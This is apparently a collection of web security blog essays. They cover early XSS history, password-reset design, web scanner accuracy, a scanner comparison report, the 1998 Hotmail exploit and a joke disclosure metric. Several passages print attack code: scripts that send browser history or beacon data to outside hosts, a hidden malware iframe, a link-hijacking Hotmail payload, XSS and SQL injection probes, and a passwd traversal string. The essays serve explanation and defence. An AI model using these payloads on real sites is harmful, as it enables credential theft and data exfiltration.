Primordial cross-site scripting (XSS) exploits

The Hacking Web Apps book covers HTML Injection and cross-site scripting (XSS) in Chapter 2. Within the restricted confines of the allotted page count, it describes one of the most pervasive attacks that plague modern web applications.

Yet XSS is old. Very, very old. Born in the age of acoustic modems barely a Planck Era after the creation of the web browser.

Early descriptions of the attack used terms like “malicious HTML” or “malicious JavaScript” before the phrase “cross-site scripting” became canonized by the OWASP Top 10. While XSS is an easy point of reference, the attack could be more generally called HTML injection because an attack does not have to “cross sites” or rely on JavaScript to be successful. The infamous Samy attack didn’t need to leave the confines of MySpace (nor did it need to access cookies) to effectively DoS the site within 24 hours. And persistent XSS is just as dangerous if an attacker injects an iframe that points to a malware site — no JavaScript required.
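
A persistent payload that delivers such an attack can be trivially small. The following line is only an illustration (the URL is made up); if a site stores it and echoes it back to other visitors, every one of them silently loads the attacker's page, no JavaScript involved:

<iframe src="http://malware.example/exploit" width="0" height="0" style="display:none"></iframe>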

Here’s one of the earliest references to the threat of XSS from a message to the comp.sys.acorn.misc newsgroup on June 30, 1996¹. It mentions only a handful of possible outcomes:

Another ‘application’ of JavaScript is to poke holes in Netscape’s security. To *anyone* using old versions of Netscape before 2.01 (including the beta versions) you can be at risk to malicious Javascript pages which can
a) nick your history
b) nick your email address
c) download malicious files into your cache *and* run them (although you need to be coerced into pressing the button)
d) examine your filetree.

From that message we can go back several months to the announcement of Netscape Navigator 2.0 on September 18, 1995. A month later Netscape created a “Bugs Bounty” starting with its beta release in October. The bounty offered rewards, including a $1,000 first prize, to anyone who discovered and disclosed a security bug within the browser. A few weeks later the results were announced and first prize went to a nascent JavaScript hack.

The winner of the bug hunt, Scott Weston, posted his find to an Aussie newsgroup. This was almost 15 years ago on December 1, 1995 (note that LiveScript was the precursor to JavaScript):

The “LiveScript” that I wrote extracts ALL the history of the current netscape window. By history I mean ALL the pages that you have visited to get to my page, it then generates a string of these and forces the Netscape client to load a URL that is a CGI script with the QUERY_STRING set to the users History. The CGI script then adds this information to a log file.

Scott, faithful to hackerdom tenets, included a pop-culture reference² in his description of the sensitive data extracted about the unwitting victim:

– the URL to use to get into CD-NOW as Johnny Mnemonic, including username and password.
– The exact search params he used on Lycos (i.e. exactly what he searched for)
– plus any other places he happened to visit.

HTML injection targets insecure web applications. These examples show how a successful attack could harm the victim rather than how the web site itself was hacked. Browser security helps mitigate the impact of such attacks, but a browser’s fundamental purpose is to parse and execute the HTML and JavaScript returned by a web application, which is a dangerous prospect when the page is laced with malicious content inserted by an attacker. The 1995 exploit is almost indistinguishable from a modern payload; a real attack might simply have used a more subtle <img> or <iframe> rather than changing location.href:

<SCRIPT LANGUAGE="LiveScript">
i = 0
yourHistory = ""
while (i < history.length) {
  yourHistory += history[i]
  i++;
  if (i < history.length) yourHistory += "^"
}
location.href = "http://www.tripleg.com.au/cgi-bin/scott/his?"+yourHistory
<!-- hahah here is the hidden script --></i></SCRIPT>

The actual exploit reflected the absurd simplicity typical of XSS attacks. They often require little effort to create, but carry a significant impact. This differs greatly from binary exploits (e.g. heap and buffer overflows) that require days, weeks, or months to develop.
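
For comparison, here is a minimal sketch, not taken from the original post, of how the same kind of data could be leaked today with a dynamically created img element instead of rewriting location.href. The collection endpoint is hypothetical, and modern browsers no longer expose individual history entries to scripts, so only the history length is available:

<script>
// hypothetical attacker endpoint; the request fires silently in the background
var beacon = new Image();
beacon.src = "https://attacker.example/log?h=" + encodeURIComponent(history.length);
</script>

The page never visibly changes, which is precisely why image-based beacons remain a common exfiltration channel.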

Before closing let’s take a tangential look at the original $1,000 “Bugs Bounty”. Today, the Chromium team offers $500 and $1,337³ rewards for security-related bugs. The Mozilla Foundation offers $500 and a T-Shirt.

On the other hand, you can keep the security bug from the browser developers and earn $10,000 and a laptop for a nice, working exploit.

Come to think of it…those options seem like a superior hourly rate to writing a book. And I cringe at the difference if you compare rates based on word count.

—–
1 Netscape Navigator 3.0 was already available in April of the same year.
2 Good luck tracking down the May 1981 issue of Omni Magazine in which William Gibson‘s short story first appeared!
3 No, the extra $337 isn’t the adjustment for inflation from 1995, which would have made it $1,407.72 according to the Bureau of Labor Statistics. It’s one of those numbers that, if you have to ask, you risk exposing yourself as a n00b. Don’t ask about that one either.


The alien concept of password security

A post on Stack Overflow¹ seeks advice on the relative security of a password reset mechanism that emails a temporary link versus one that emails a temporary password. The question brings to mind some issues addressed in Chapter 5: Breaking Authentication Schemes of The Book. Stack Overflow questions typically attract high quality answers, which is a testament to the site’s knowledgeable readership and reputation system. Responses to this particular post didn’t fail.

Rather than retread the answers, let’s consider the underlying implication behind the question: it can be acceptable to send passwords via email.

Don’t do it. Don’t give users the expectation that passwords might be sent via email. Doing so is unnecessary and makes a dangerous practice seem acceptable. If the site ever sends a password to a user, then the user might be conditioned to communicate in the other direction. An email purportedly from the site’s administrators might ask for the user’s password to “verify the account is active”, “prevent the account from being terminated”, or “restore information”. The email need not ask for a direct response; it may be an indirect prompt that uses cautionary, concerned language to send the victim to a spoofed login page.

Legitimate site administrators will not solicit passwords via email or any other out-of-band channel. Sites won’t ask for passwords except at authentication barriers, and sites shouldn’t send passwords, however temporary they may be.

“Newt. My name’s Newt.”²

Passwords, shared secrets ostensibly known only to the user and the web site, are a necessary evil of authentication. The password proves a user’s identity to a web site under the assumption that only the person who logs in as Newt, for example, knows that the account’s password is rebecca.

A password’s importance to web security is frustratingly out of proportion to the amount of control a site can exert over its protection. Users must be trusted not only to choose hard-to-guess words or phrases, but also not to share the password or divulge it through accident or ignorance. Only the luckiest of potential victims will click an emailed link and be brought to a friendly page:

“That’s it man, game over man, game over!”

Password reuse among sites poses another serious risk. The theft of a user’s credentials (email address and password) for a site like http://www.downloadwarez.free might seem relatively innocuous, but what if they’re the same credentials used for allof.my.friends or http://www.mostly.secure.bank? Even worse, what if the password matches the one for the Gmail, Hotmail, or Yahoo account? In that case: “Nuke the entire site from orbit. It’s the only way to be sure.”

“Seventeen days? Hey man, I don’t wanna rain on your parade, but we’re not gonna last seventeen hours!”

Use random, temporary links for password reset mechanisms via email. By this point you should be sufficiently warned off of the alternative of emailing temporary passwords. An obstinate few might choose to stick with passwords, arguing that there’s no difference between the two once they hit the unencrypted realm of email.

Instead, use a forward-thinking solution that tries to secure the entire reset process:

  • Maintain the original password until the user changes it. Perhaps they’ll remember it anyway. This also prevents a mini denial of service in which attackers force users to change their passwords.
  • Use a strong pseudo-random number generator to minimize the chance that brute force attacks can guess the link.
  • Expire the link after a short period of time, perhaps minutes or hours. This narrows the window of opportunity for brute force attacks that attempt to guess links. It’s no good to let an attacker initiate a password reset on a Friday evening and have a complete weekend to brute force links until the victim notices the e-mail on a Monday morning. (See the sketch after this list.)
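
As a minimal sketch of the last two points, assuming a Node.js back end and hypothetical saveResetToken and loadResetToken persistence helpers, token generation and verification might look like this:

const crypto = require('crypto');

const RESET_TTL_MS = 30 * 60 * 1000; // links expire after 30 minutes

function createResetLink(userId) {
  // 32 bytes from a CSPRNG makes brute forcing the link impractical
  const token = crypto.randomBytes(32).toString('hex');
  saveResetToken(userId, token, Date.now() + RESET_TTL_MS); // hypothetical storage call
  return 'https://www.site.example/reset?token=' + token;
}

function redeemResetToken(userId, token) {
  // hypothetical lookup returning { token, expiresAt } or null
  const record = loadResetToken(userId);
  if (!record || Date.now() >= record.expiresAt) return false;
  if (record.token.length !== token.length) return false;
  // constant-time comparison avoids leaking the stored token through timing
  return crypto.timingSafeEqual(Buffer.from(record.token), Buffer.from(token));
}

The token should also be invalidated after a single use so a leaked email can’t be replayed later.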

“Maybe we got ’em demoralized.”

For those of you out there who visit web sites rather than create them there’s one rule you should never ignore. If the site’s password recovery mechanism emails you the original password for your account, then stop using the site. Period. Full stop. Should you be forced to use the site under threat of violence or peer pressure, whichever is worse, at the very least choose a password that isn’t shared with any other account. Storing unencrypted passwords is lazy, bad security design, and a liability.

—–
1 Huzzah! A site name that doesn’t succumb to stripping spaces, prefixing an ‘e’ or ‘i’, or using some vapid, made-up word only because it consists of four or five letters!
2 Quotes from the movie Aliens. If you didn’t already know that stop reading and go watch it now. We’ll wait. See you in about two hours.

Web Scanner Evaluation: Accuracy

This is the first in a series of essays describing suggested metrics for evaluating web application security scanners.

Accuracy measures the scanner’s ability to detect vulnerabilities. The basic function of a web scanner is to use automation to identify the same, or most of the same, vulnerabilities as a web security auditor. Rather than focus on the intricate details of specific vulnerabilities, this essay describes two major areas of evaluation for a scanner: its precision and faults.

Precision
Precise scanners produce results that not only indicate the potential for compromise of the web site, but also provide actionable information that helps developers understand and address security issues.
Comprehensive tests should be measured by the different ways a vulnerability might manifest rather than by a raw count of payloads. The scope of a test is affected by several factors:
  • Alternate payloads (e.g. tests for XSS within an href attribute or the value attribute of an input element, using intrinsic events, within a JavaScript variable, or that create new elements; illustrated after this list)
  • Encoding and obfuscation (e.g. employing various character sets or encoding techniques to bypass possible filters)
  • Applicability to different technologies in a web platform (e.g. PHP superglobals, .NET VIEWSTATE)
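To illustrate why alternate payloads matter, here is a hedged example of how the same probe has to change shape depending on where the injected value lands; the surrounding markup is hypothetical:

<!-- injected value lands inside an href attribute -->
<a href="javascript:alert(1)">profile</a>

<!-- injected value breaks out of an input element's value attribute -->
<input value=""><script>alert(1)</script>">

<!-- injected value arrives as a new element with an intrinsic event handler -->
<img src="x" onerror="alert(1)">

<!-- injected value escapes a JavaScript string variable -->
<script>var q = "";alert(1);//";</script>

A scanner that only ever sends the classic <script>alert(1)</script> string misses most of these contexts.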
Robust detection mechanisms correctly confirm the presence of a vulnerability; they typically fall into one of three categories:
  • Signatures such as HTTP response code, string patterns, and reflected content (e.g. matching ODBC errors or looking for alert(1) strings)
  • Inference based on interpreting the results of a group of requests (e.g. “blind” SQL injection that affects the content of a response based on specific SQL query constructions)
  • Time-based tests measure the responsiveness of the web site to various payloads (a rough sketch follows this list). Not only can they extend inference-based tests, but they can also indicate potential areas of Denial of Service if a payload can cause the site to spend more resources processing a request than the attacker spends making it (e.g. a query that performs a complete table scan of a database).
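As a rough sketch of a time-based check, assuming Node.js 18+ with the built-in fetch and a placeholder target URL (a real scanner repeats the measurement and establishes a baseline first):

// compare the response time for a benign value against one that asks the database to sleep
async function timeRequest(url) {
  const start = Date.now();
  await fetch(url);
  return Date.now() - start;
}

async function checkTimeBasedSqli(baseUrl) {
  const benign = await timeRequest(baseUrl + '?id=1');
  const delayed = await timeRequest(baseUrl + "?id=1'+AND+SLEEP(5)--+-");
  // a single comparison is only suggestive; treat it as a lead, not a confirmation
  return (delayed - benign) > 4000;
}

// hypothetical usage: checkTimeBasedSqli('http://test.site.example/item').then(console.log);
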
Injection vectors are the points where a scanner applies its security tests. The most obvious injection points are query string parameters and visible form fields. The web browser should at least be considered an untrusted source, if not an adversarial one. Consequently, a web scanner should be able to run security checks via all aspects of HTTP communication, including:
  • URI parameters
  • POST data
  • Client-side headers, especially the ones more commonly interpreted by web sites, including User-Agent, the forever-misspelled Referer, and Cookie (a minimal sketch follows this list)
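A minimal sketch of probing those headers, again assuming Node.js 18+ with the built-in fetch and a placeholder target, might look like the following; the reflection check is deliberately naive:

const target = 'http://test.site.example/app/page';
const probe = '"><script>alert(1)</script>';

async function probeHeaders() {
  const headerSets = [
    { 'User-Agent': probe },
    { 'Referer': probe },                                // misspelled, as HTTP demands
    { 'Cookie': 'session=' + encodeURIComponent(probe) },
  ];
  for (const headers of headerSets) {
    const body = await (await fetch(target, { headers })).text();
    // naive signature: the raw probe reflected verbatim in the response
    if (body.includes(probe)) {
      console.log('possible reflection via', Object.keys(headers)[0]);
    }
  }
}

probeHeaders();
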
Faults
Errors in a scanner’s results take away from the time-saving gains of automation by requiring users to dig into non-existent vulnerabilities or to spend too much time repeating the scanner’s tests in order to confirm that certain vulnerabilities do not exist.
False positives indicate insufficient analysis of a potential vulnerability. The cause of a false positive can be hard to discern without intimate knowledge of the scanner’s internals, but often falls into one of these categories:
  • Misdiagnosis of generic error page or landing page
  • Poor test implementation that misinterprets correlated events to infer cause from effect (e.g. changing a profile page’s parameter value from Mike to Mary to view another user’s public information is not a case of account impersonation – the web site intentionally displays the content)
  • Sole reliance on an inadequate test signature to claim the vulnerability exists (e.g. a poor regex, or assuming that an HTTP 200 response code for ../../../../etc/passwd means the password file is accessible)
  • Web application goes into error state due to load (e.g. database error occurs because the server has become overloaded by scan traffic, not because a double quote character was injected into a parameter)
  • Lack of security impact (e.g. an unauthenticated, anonymous search form is vulnerable to CSRF – search engines like Google, Yahoo!, and Bing are technically vulnerable but the security relevance is questionable)
The effort expended to invalidate an erroneous vulnerability wastes time better spent investigating and verifying actual vulnerabilities. False positives also reduce trust in the scanner.
False negatives expose a more worrisome aspect of the scanner because the web site owner may gain a false sense of security by assuming, incorrectly, that a report with no vulnerabilities implies the site is fully secure. Several situations lead to a missed vulnerability:
  • Lack of test. The scanner simply does not try to identify the particular type of vulnerability.
  • Poor test implementation that too strictly defines the vulnerability (e.g. XSS tests that always contain <script> or javascript: under the mistaken assumption that those are required to exploit an XSS vuln)
  • Inadequate signatures (e.g. the scanner does not recognize SQL errors generated by Oracle)
  • Insufficient replay of requests (e.g. a form submission requires a valid e-mail address in one field in order to exploit an XSS vulnerability in another field)
  • Inability to automate (e.g. the vulnerability is related to a process that requires understanding of a sequence of steps or knowledge of the site’s business logic). The topic of vulnerabilities for which scanners cannot test (or have great difficulty testing) will be addressed separately.
  • Lack of authentication state (e.g. the scanner is able to authenticate at the beginning of the scan, but unknowingly loses its state, perhaps by hitting a logout link, and does not attempt to restore authentication)
  • Link not discovered by the scanner. This falls under the broader scope of site coverage, which will be addressed separately.
The optimistic aspect of false negatives is that a scanner’s test repository can always grow. In this case a good metric is determining the ease with which false negatives are addressed.
Summary
Accuracy is an important aspect of a web scanner. Inadequate tests might make a scanner more cumbersome to use than a simple collection of tests scripted in Perl or Python. Too many false positives reduce the user’s confidence in the scanner and waste valuable time on items that should never have been identified. False negatives may or may not be a problem depending on how the web site’s owners rely on the scanner and whether the missed vulnerabilities are due to lack of tests or poor methodology within the scanner.
One aspect not addressed here is measuring how accuracy scales against larger web sites. A scanner might be able to effectively scan a hundred-link test application, but suffer in the face of a complex site with various technologies, error patterns, and behaviors.
Finally, accuracy is only one measure of the utility of a web application scanner. Future essays will address other topics such as site coverage, efficiency, and usability.

Observations on Larry Suto’s Paper about Web Application Security Scanners

Note: I’m the lead developer for the Web Application Scanning service at Qualys and I worked at NTO for about three years from July 2003; both tools were included in this February 2010 report by Larry Suto. Nevertheless, I most humbly assure you that I am the world’s foremost authority on my opinion, however biased it may be.

The February 2010 report, Analyzing the Accuracy and Time Costs of Web Application Security Scanners, once again generated heated discussion about web application security scanners. (A similar report was previously published in October 2007.) The new report addressed some criticisms of the 2007 version and included more scanners and more transparent targets. The 2010 version, along with some strong reactions to it, engenders some additional questions on the topic of scanners in general:

How much should the ability of the user affect the accuracy of a scan?

Set aside basic requirements to know what a link is or whether a site requires credentials to be scanned in a useful manner. Should a scan result be significantly more accurate or comprehensive for a user who has several years of web security experience than for someone who just picked up a book in order to have spare paper for origami practice?

I’ll quickly concede the importance of in-depth manual security testing of web applications as well as the fact that it cannot be replaced by automated scanning. (That is, in-depth manual testing can’t be replaced; unsophisticated tests or inexperienced testers are another matter.) Tools that aid the manual process have an important place, but how much disparity should there really be between “out of the box” and “well-tuned” scans? The difference should be as little as possible, with clear exceptions for complicated sequences, hidden links, or complex authentication schemes. Tools that require too much time to configure, maintain, and interpret don’t scale well for efforts that require scanning more than a handful of sites at a time. Tools whose accuracy correlates to the user’s web security knowledge scale at the rate of finding smart users, not at the rate of deploying software.

What’s a representative web application?

A default installation of osCommerce or Amazon? An old version of phpBB or the WoW forums? Web sites have wildly different coding styles, design patterns, underlying technologies, and levels of sophistication. A scanner that works well against a few dozen links might grind to a halt against a few thousand.

Accuracy against a few dozen hand-crafted links doesn’t necessarily scale against more complicated sites. Then there are web sites — in production and earning money no less — with bizarre and inefficient designs such as 60KB .NET VIEWSTATE fields or forms with seven dozen fields. A good test should include observations on a scanner’s performance at both ends of the spectrum.

Isn’t gaming a vendor-created web site redundant?

A post on the Acunetix blog accuses NTO of gaming the Acunetix test site based on a Referer field from web server log entries. First, there’s no indication that the particular scan cited was the one used in the comparison; the accusation has very flimsy support. Second, vendor-developed test sites are designed for the very purpose of showing off the web scanner. It’s a fair assumption that Acunetix created their test sites to highlight their scanner in the most positive manner possible, just as HP, IBM, Cenzic, and other web scanner vendors would (or should) do for their own products. There’s nothing wrong with ensuring a scanner (the vendor’s or any other’s) performs most effectively against a web site offered for no other purpose than to show off the scanner’s capabilities.

This point really highlights one of the drawbacks of using vendor-oriented sites for comparison. Your web site probably doesn’t have the contrived HTML, forms, and vulnerabilities of a vendor-created intentionally-vulnerable site. Nor is it necessarily helpful that a scanner proves it can find vulnerabilities in a well-controlled scenario. Vendor sites help demonstrate the scanner, they provide a point of reference for discussing capabilities with potential customers, and they support marketing efforts. You probably care how the scanner fares against your site, not the vendor’s.

What about the time cost of scaling scans?

The report included a metric that attempted to demonstrate the investment of resources necessary to train a scanner. This is useful for users who need tools to aid in manual security testing or users who have only a few web sites to evaluate.

Yet what about environments where there are dozens, hundreds, or — yes, it’s possible — thousands of web sites to secure within an organization? The very requirement of training a scanner to deal with authentication or crawling works against running scans at a large scale. This is why point-and-shoot comparison should be a valid metric. (In opposition to at least one other opinion.)

Scaling scans requires more than the time to train a tool. It also requires hardware resources to manage configurations, run scans, and centralize reporting. This is a point where Software as a Service begins to seriously outpace other solutions.

Where’s the analysis of normalized data?

I mentioned previously that point-and-shoot should be one component of scanner comparison, but it shouldn’t be the only point — especially for tools intended to provide some degree of customization, whether it simply be authenticating to the web application or something more complex.

Data should be normalized not only within vulnerabilities (e.g. comparing reflected and persistent XSS separately, comparing error-based SQL injection separately from inference-based detections), but also within the type of scan. Results without authentication shouldn’t be compared to results with authentication. Another step would be to compare the false positive/negative rates for tests scanners actually perform rather than for checks a tool doesn’t perform. It’s important to note where a tool does or does not perform a check versus other scanners, but not performing a check reflects on accuracy differently than performing a check that still fails to identify a vulnerability.

What’s really going on here?

Designing a web application scanner is easy; implementing one is hard. Web security has complex problems, many of which have different levels of importance, relevance, and even nomenclature. The OWASP Top 10 project continues to refine its list by bringing more coherence to the difference between attacks, countermeasures, and vulnerabilities. The WASC-TC aims for a more comprehensive list defined by attacks and weaknesses. Contrasting the two approaches highlights different methodologies for testing web sites and evaluating their security.

So, if performing a comprehensive security review of a web site is already hard, then it’s likely to have a transitive effect on comparing scanners. Comparisons are useful and provide a service to potential customers, who want to find the best scanner for their environment, and useful to vendors, who want to create the best scanner for any environment. The report demonstrates areas not only where scanners need to improve, but where evaluation methodologies need to improve. Over time both of these aspects should evolve in a positive direction.

Earliest(-ish) hack against web-based e-mail

The book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed. Consider the following example, over a decade old, of HTML injection before terms like XSS became so ubiquitous. The exploit appeared about two years before the blanket CERT advisory that called attention to the insecurity of unchecked HTML.

On August 24, 1998, a Canadian web developer, Tom Cervenka, posted a message to the comp.lang.javascript newsgroup that claimed:

We have just found a serious security hole in Microsoft’s Hotmail service (http://www.hotmail.com/) which allows malicious users to easily steal the passwords of Hotmail users. The exploit involves sending an e-mail message that contains embedded javascript code. When a Hotmail user views the message, the javascript code forces the user to re-login to Hotmail. In doing so, the victim’s username and password is sent to the malicious user by e-mail.

The discoverers, in apparent ignorance of the 1990s labeling requirements for hacks to include foul language or numeric characters, simply dubbed it the “Hot”Mail Exploit. (They demonstrated further lack of familiarity with disclosure methodologies by omitting greetz, lacking typos, and failing to remind the reader of their near-omnipotent skills, surely an anomaly at the time. They did not fail on all counts, though: the hacker satisfied the Axiom of Hacking Culture by choosing a name, Blue Adept, that referenced pop culture, in this case the title of a fantasy novel by Piers Anthony.)

The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was co-opted by the Web 2.0 fad) that spoofed Hotmail’s login.

The attack wasn’t particularly sophisticated, but it didn’t need to be. The login form collected the victim’s login name and password then mailed them, along with the victim’s IP address, to the newly-created Geocities account.

The second step involved executing the actual exploit against Hotmail by sending an e-mail with HTML that contained a rather curious img tag:

<img src="javascript:errurl='http://www.because-we-can.com/users/anon/hotmail/getmsg.htm';
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target='work';
top.submenu.document.links[i].href=errurl;}noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target='work';
top.work.document.links[i].href=errurl;}">

The JavaScript changed the browser’s DOM such that any click would take the victim to the spoofed login page at which point the authentication credentials would be coaxed from the unwitting visitor. The original payload didn’t bother to obfuscate the JavaScript inside the src attribute. Modern attacks have more sophisticated obfuscation techniques and use tags other than the img element. The problem of HTML injection, although well known for over 10 years, remains a significant attack against web applications.

Factor of Ultimate Doom

Vulnerability disclosure presents a complex challenge to the information security community. A reductionist explanation of disclosure arguments need only present two claims. One end of the spectrum goes, “Only the vendor need know so no one else knows the problem exists, which means no one can exploit it.” The information-wants-to-be-free diametric opposition simply states, “Tell everyone as soon as the vulnerability is discovered”.

The Factor of Ultimate Doom (FUD) is a step towards reconciling this spectrum into a laser-focused compromise of agreement. It establishes a metric for evaluating the absolute danger inherent to a vulnerability, thus providing the discoverer with guidance on how to reveal the vulnerability.

The Factor is calculated by simple addition across three axes: Resources Expected, Protocol Affected, and Overall Impact. Vulnerabilities that do not meet any of the Factor’s criteria may be classified under the Statistically Irrelevant Concern metric, which will be explored at a later date.

Resources Expected
(3) Exploit doesn’t require shellcode; merely a JavaScript alert() call
(2) Exploit shellcode requires fewer than 12 bytes. In other words, it must be more efficient than the export PS1=# hack (to which many operating systems, including OS X, remain vulnerable)
(1) Exploit shellcode requires a GROSS sled. (A GROSS sled uses opcode 144 on Intel x86 processors, whereas the more well-known NOP sled uses opcode 0x90.)

Protocol Affected
(3) The Common Porn Interchange Protocol (TCP/IP)
(2) Multiple online rhetorical opinion networks
(1) Social networks

Overall Impact
(3) Control every computer on the planet
(2) Destroy every computer on the planet
(1) Destroy another planet (obviously, the Earth’s internet would not be affected — making this a minor concern)

The resulting value is measured against an Audience Rating to determine how the vulnerability should be disclosed. This provides a methodology for verifying that a vulnerability was responsibly disclosed.

Audience Rating (by Factor of Ultimate Doom*)
(> 6) Can only be revealed at a security conference
(< 6) Cannot be revealed at a security conference
(< 0) Doesn’t have to be revealed; it’s just that dangerous

(*Due to undisclosed software patent litigation, values equal to 6 are ignored.)